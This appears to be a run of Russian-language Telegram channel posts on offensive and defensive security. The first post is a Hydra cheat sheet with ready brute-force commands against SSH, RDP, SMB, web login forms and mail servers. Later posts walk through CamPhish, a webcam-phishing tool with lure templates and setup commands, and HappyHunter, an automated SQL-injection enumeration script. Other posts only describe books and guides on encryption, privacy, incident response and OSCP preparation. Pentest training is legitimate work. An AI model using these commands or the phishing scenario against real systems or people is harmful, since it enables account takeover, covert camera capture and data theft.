🔐 Годная шпаргалка по Hydra — инструмент для параллельного подбора паролей, встроенная в различные операционные системы для пентеста такие как Kali Linux.

Брутфорс для SSH:

hydra -l username -P password_list.txt ssh://IP_адрес

Брутфорс для FTP:

hydra -l username -P password_list.txt ftp://IP_адрес

Брутфорс для RDP:

hydra -l username -P password_list.txt rdp://IP_адрес

Брутфорс для Telnet:

hydra -l username -P password_list.txt telnet://IP_адрес

Брутфорс для HTTP Basic Authentication:

hydra -l username -P password_list.txt http-get://IP_адрес

Брутфорс для HTTP-форм:

hydra -l username -P password_list.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"

Брутфорс для POP3:

hydra -l username -P password_list.txt pop3://IP_адрес

Брутфорс для SMTP:

hydra -l username -P password_list.txt smtp://IP_адрес

Брутфорс для IMAP:

hydra -l username -P password_list.txt imap://IP_адрес

Указание максимального числа потоков (например, 4):

hydra -t 4 -l username -P password_list.txt ftp://IP_адрес

Брутфорс с использованием логина из файла:

hydra -L user_list.txt -P password_list.txt ssh://IP_адрес

Брутфорс для VNC:

hydra -P password_list.txt vnc://IP_адрес

Брутфорс для SMB:

hydra -l username -P password_list.txt smb://IP_адрес

Прерывание брутфорс атаки после первой удачной попытки:

hydra -l username -P password_list.txt -f ssh://IP_адрес

Указание паузы между попытками (например, 2 секунды):

hydra -l username -P password_list.txt -t 4 -w 2 ssh://IP_адрес

Брутфорс с использованием прокси:

hydra -l username -P password_list.txt -o результат.txt -s порт -t 4 -x прокси:порт ssh://IP_адрес

Сохранение результатов в файл:

hydra -l username -P password_list.txt -o результат.txt ssh://IP_адрес

#doc #cheatsheet #pentest #redteam

💻 Как работает фишинг на веб-камеру

CamPhish — инструмент, который наглядно показывает, как с помощью социальной инженерии можно выманить у пользователя доступ к его камере. Никаких взломов — только игра на доверии и механика разрешений браузера.

🤨 Как строится атака с CamPhish

Типичный сценарий, на котором держится весь трюк:

🟢 Локальный сервер — злоумышленник запускает у себя поддельный сайт.
🟢 Проброс наружу — через ngrok/Cloudflare генерируется доступная извне ссылка на этот сайт.
🟢 Приманка — жертве отправляют ссылку под правдоподобным предлогом: “прямая трансляция”, “поздравление”, “онлайн-встреча”.
🟢 Запрос доступа — при переходе сайт просит разрешение на использование камеры.
🟢 Съёмка — если пользователь соглашается, инструмент делает снимки с его устройства.

Такую технику используют пентестеры, чтобы проверить, насколько сотрудники организации понимают риски фишинга и не нажимают на всё подряд.

💀 Что предлагает CamPhish

В комплекте несколько готовых шаблонов, которые имитируют реальные сценарии социнженерии:

💬 «Поздравление с праздником»
💬 Поддельная YouTube-трансляция
💬 Фейковая онлайн-встреча

Установка:

sudo apt-get -y install php wget unzip
git clone https://github.com/techchipnet/CamPhish
cd CamPhish

▶️ Запуск

bash camphish.sh

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

♎️ GitHub/Инструкция

#cybersec #pentest #redteam

⚡️ Практика Python ⚡️
⚔️ Дрон + Python
⚙️ Как Python автоматизировал склад с помощью дрона

♻️ https://youtu.be/liProfyxH4U

👍 Спасибо за просмотр и поддержку!

#youtube

💻 2025 Cybersecurity Attacks Playbook

Актуальные сценарии кибератак 2025 года: от фишинга, усиленного ИИ, до атак на цепочки поставок, сложных рансомвар-кампаний и многослойных взломов инфраструктуры. Каждый раздел включает этапы подготовки, обнаружения, анализа, локализации, устранения, восстановления и выводов по конкретному типу атаки.

🧠 Новые угрозы, усиленные ИИ

🟢Фишинговые рассылки, генерируемые искусственным интеллектом.
🟢Дипфейк-атаки на руководителей компаний.
🟢Адаптивное вредоносное ПО, которое эволюционирует в реальном времени.
🟢Криптографические риски, связанные с развитием квантовых вычислений.

💀 Продвинутые персистентные атаки

🟢Внедрение в цепочки поставок.
🟢Процессы реагирования на ранее неизвестные zero-day уязвимости.
🟢Многоуровневые сценарии работы с рансомваром.
🟢Fileless-атаки, использующие системные инструменты (LOLBins).

🔐 Компрометация инфраструктуры

🟢Эксплуатация IoT-устройств в распределённых экосистемах.
🟢Ошибки конфигураций облака и скрытое боковое перемещение.
🟢Взлом через фальшивые точки доступа и беспроводные атаки.
🟢Подмена DNS и манипуляция кешем.

📁 Угрозы приложениям и данным

🟢SQL-инъекции с использованием техник скрытности.
🟢Скрытая утечка данных через стеганографию
🟢Масштабные credential-атаки.
🟢«Островные» атаки через доверенные третьи сервисы.

⚙️ Каждый плейбук включает

🟢Проверку защищённости ресурсов и превентивную подготовку.
🟢Мультиканальное обнаружение угроз (SIEM, EDR, NDR).
🟢Выделение индикаторов компрометации и карту атаки.
🟢Сценарии локализации и устранения.
🟢Восстановление и постинцидентную валидацию.
🟢Непрерывную интеграцию опыта и улучшений.

#doc #pentest #books #cybersec

💻 Шифрование файлов при помощи GPG

gpg — это инструмент шифрования и электронного подписывания. В его работе используется ассиметричное шифрование, основанное на двух ключах: приватный и публичный. Приватный ключ иногда называют секретным. А публичный ключ называют открытым.

#cybersec #linux #russian

💻 Counter-OSINT: руководство по приватности и защите своих данных в Сети на русском

💬 Приватность и ценность личной информации.
💬 Удаление информации о себе.
💬 Приватность в социальных сетях Telegram, Instagram, VK другие.
💬 Цифровая гигиена, телефонный номер, почта, местоположение, пароли и д.р.
💬 Утечки данных и пробив.
💬 Приватность для разработчиков и многое другое.

#osint #cybersec #russian

💻 Основы безопасности веб-приложений: краткий «курс» по выявлению уязвимостей

Как выглядит веб-приложение с точки зрения злоумышленника?

Чтобы ответить на этот вопрос, сегодня мы возьмем заведомо уязвимое приложение и на его примере разберемся, как искать точки входа, какие инструменты использовать для разведки и атаки, какие уязвимости можно повстречать и как их обнаружить в исходном коде.

👇 Статья в PDF с примерами на русском

#article #pentest #redteam #cybersec

💻 Стеганографические методы защиты информации

Стеганография — это искусство скрытой передачи информации: когда сообщение спрятано так глубоко, что его даже не замечают. Этими методами пользовались спецслужбы, преступники и все, кому нужно сохранить тайну и защитить данные от посторонних глаз.

Материал погружает в основы скрытых каналов связи, объясняет, как работают разные стеганографические техники, и содержит полноценный практикум. Вы научитесь прятать данные внутри изображений, аудио, текста, сетевых протоколов, познакомитесь с большим набором инструментов и на практике увидите, как эти методы применяются в реальных условиях.

#book

💀 Хакеры могли уже побывать у вас дома — проверяемся.

Исследователи из GreyNoise выкатили сервис, который за пару секунд покажет, светился ли ваш IP в ботнетах, DDoS-сетях и подозрительных активностях.

💻 Просто заходите — система сама считает ваш IP и сверяет его с базами взломщиков.

Можно проверить и домашний интернет, и свой сервис (тот самый «на три буквы») — вдруг уже бьют в дверь, а вы не в курсе.

👨‍🔬 Проверяемся ТУТ

#soft #cybersec

💻 Гайд, который должен быть у каждого киберспециалиста — Windows & PowerShell Commands: Essential Guide for Cybersecurity Professionals

Это не просто сборник команд — это полноценный боевой инструмент для тех, кто работает в безопасности, расследует инциденты или охотится на угрозы. Автор собрал самые важные техники анализа Windows-систем на уровне Blue Team, DFIR и даже Red Team.

💬 Windows CLI для боевой аналитики

Команды, без которых не обойтись при живом расследовании:

* проверка и разбор журналов событий (wevutil, eventvwr, Get-WinEvent)
* просмотр активных пользователей и сессий
* анализ процессов, служб, сетевых подключений
* аудит файловой системы и прав доступа

💬 PowerShell для DFIR и Threat Hunting

Глубокая диагностика системы с точностью до артефакта:

* перечисление процессов, сервисов, локальных пользователей
* CIM/WMI-запросы для детальной OS-разведки
* сетевой анализ и мониторинг в реальном времени
* изучение реестра на предмет автозагрузок и следов малвари
* сбор ключевых артефактов для расследования

💬 Active Directory — разведка и защита

Набор команд для анализа идентичностей и прав:

* запросы объектов AD, поиск пользователей и групп
* выявление признаков эскалации привилегий
* анализ логонов, сеансов, trust-отношений
* обнаружение опасных конфигураций и аномалий

💬 База для Incident Response

Пошаговые команды для быстрого триажа:

* проверка компрометации хоста
* признаки lateral movement
* анализ злоупотребления учётками и привилегиями

💬 Red Team vs Blue Team: инструменты на одной странице

* компактные приёмы для разведки и анализа
* политики выполнения скриптов
* техники обхода защиты (в контексте того, как их правильно *обнаруживать*)

Если вы работаете с безопасностью Windows, реагируете на инциденты или хотите поднять уровень Threat Hunting — этот гайд становится настольным.

#doc #books

💻 Гайд, который должен быть у каждого киберспециалиста — Windows & PowerShell Commands: Essential Guide for Cybersecurity Professionals

💻 HappyHunter — Python инструмент, который автоматизирует обнаружение и перечисление баз данных, уязвимых для SQL-инъекций.

Если вы занимаетесь багбаунти, тестированием безопасности или OSINT-разведкой, этот скрипт должен быть у вас под рукой.
HappyHunter автоматизирует самые скучные и самые важные этапы атаки — разведку, поиск уязвимостей и анализ поверхностей входа.

💀 Скрипт интегрируется с sqlmap и превращает его мощь в полностью автоматизированный рабочий процесс. Прочёсывает цель и вытаскивает максимум данных для дальнейшей работы.

Основные возможности:
🟢Автоматически определяет тип СУБД у целевого URL.
🟢Перечисляет базы данных и таблицы, если цель уязвима.
🟢Работает практически «из коробки» — минимум аргументов, максимум результата.
🟢Красивый, цветной вывод в консоли, чтобы быстрее ориентироваться.
🟢И всё это построено поверх мощнейшего движка — sqlmap.

А параллельно выполняет классическую разведку:
💬 сбор доменов и поддоменов;
💬 анализ сервисов и открытых портов;
💬 первичная карта поверхности атаки;
💬 автоматическую проверку уязвимостей.

Где пригодится?
* быстрый аудит безопасности веб-приложений;
* подготовка к пентесту;
* багбаунти-хантинг, когда нужно «пробежать» по целям;
* проверка своих сервисов на SQL-инъекции;
* обучение OSINT и атакующей аналитике.

⌨️ Установка:

git clone https://github.com/HackingTeamOficial/HappyHunter.git
cd HappyHunter

▶️ Запуск:

python3 HappyHunter.py

♎️ GitHub/Инструкция

#python #soft #pentest

💻 Кибербезопасность для чайников

Обновлённое издание «Кибербезопасность для чайников» объясняет простым языком, как защитить себя, свою семью и рабочую информацию от современных угроз — от вредоносов и фишинга до атак с использованием ИИ и уязвимостей в гибридных рабочих средах.

Внутри — пошаговые инструкции, которые помогают:
➡️укрепить защиту компьютера, смартфона и домашней сети;
➡️понять, как работают хакеры и на что они давят в первую очередь;
➡️настроить надёжные меры безопасности, чтобы ваши данные не утекли;
➡️действовать правильно в ситуации, если взлом всё же случился.

Это практическое руководство для всех, кто хочет перестать быть лёгкой добычей и научиться реально управлять своей цифровой безопасностью.

#books

💻 Шпаргалки для прохождения и получения одного из самых топовых сертификатов по информационной безопасности OSCP

Команды, софт, компиляция эксплойтов, различные полезные нагрузки и д.р. необходимые хакеру вещи.

#doc #cheatsheet #cybersec #redteam #pentest